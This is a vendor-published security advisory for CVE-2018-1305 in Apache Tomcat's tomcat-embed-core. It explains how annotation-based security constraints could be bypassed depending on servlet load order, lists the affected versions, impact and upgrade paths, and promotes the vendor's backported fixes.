CVE-2018-1305: Security Bypass vulnerability in tomcat-embed-core (Maven)

What is CVE-2018-1305 About?

This vulnerability in Apache Tomcat versions 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84, is a security bypass flaw. Security constraints defined by Servlet annotations were only applied after a Servlet had been loaded, potentially exposing resources to unauthorized users. Exploitation was dependent on the servlet loading order and could lead to unauthorized access.

Affected Software

org.apache.tomcat.embed:tomcat-embed-core
- >8.5.0, <8.5.28
- >7.0.0, <7.0.85
- >9.0.0M1, <9.0.5

Technical Details

In the affected Apache Tomcat versions, security constraints specified via Servlet annotations were only evaluated and applied once the corresponding Servlet had been initialized and loaded into memory. This behavior created a race condition or an ordering issue: if a request for a URL pattern that fell under a security constraint arrived before the respective Servlet was loaded (e.g., if another Servlet matching a broader pattern was loaded first), the security constraint from the annotation would not be honored. Consequently, resources that should have been protected by the annotation-based security constraints could be accessed by unauthorized users, bypassing the intended access control mechanisms. The exposure of resources depended entirely on the specific order in which Servlets were loaded and requests processed.

What is the Impact of CVE-2018-1305?

Successful exploitation may allow attackers to bypass security constraints, leading to unauthorized access to sensitive resources and potentially information disclosure or data modification.

What is the Exploitability of CVE-2018-1305?

Exploitation involves identifying specific URL patterns that are protected by annotation-based security constraints and attempting to access them before the respective Servlet has been loaded. The complexity is moderate, as it requires understanding the application's servlet loading behavior and potentially timing requests. Authentication is generally required for exploiting access control vulnerabilities, but an attacker might attempt to access resources typically protected from unauthenticated users. No specific privileges are needed beyond being able to make requests to the application. This is a remote vulnerability. The likelihood of exploitation is higher in applications with complex servlet deployments or those experiencing heavy load, which might influence servlet loading order.

What are the Known Public Exploits?

PoC Author	Link	Commentary
Pa55w0rd	Link	Apache Tomcat 安全绕过漏洞 Poc

What are the Available Fixes for CVE-2018-1305?

A Fix by Resolved Security Exists!

See how we help you strengthen security with automated backported fixes for your libraries.

About the Fix from Resolved Security

This patch fixes CVE-2018-1305 by ensuring that all @ServletSecurity annotations are processed at web application startup instead of during servlet load or upon first request, so that security constraints are correctly and predictably enforced. Previously, constraints from annotations could be missed for servlets created or loaded dynamically, potentially allowing unauthorized access; this patch resolves that by applying constraints consistently for all servlets before the application receives requests.

Available Upgrade Options

org.apache.tomcat.embed:tomcat-embed-core
- >7.0.0, <7.0.85 → Upgrade to 7.0.85
org.apache.tomcat.embed:tomcat-embed-core
- >8.5.0, <8.5.28 → Upgrade to 8.5.28
org.apache.tomcat.embed:tomcat-embed-core
- >9.0.0M1, <9.0.5 → Upgrade to 9.0.5

Struggling with dependency upgrades?

See how Resolved Security's drop-in replacements make it simple.

Book a demo

Additional Resources

What are Similar Vulnerabilities to CVE-2018-1305?

Similar Vulnerabilities: CVE-2014-0075 , CVE-2015-5174 , CVE-2016-6816 , CVE-2017-5647 , CVE-2019-0232

CVE-2018-1305 Security Bypass vulnerability in tomcat-embed-core (Maven)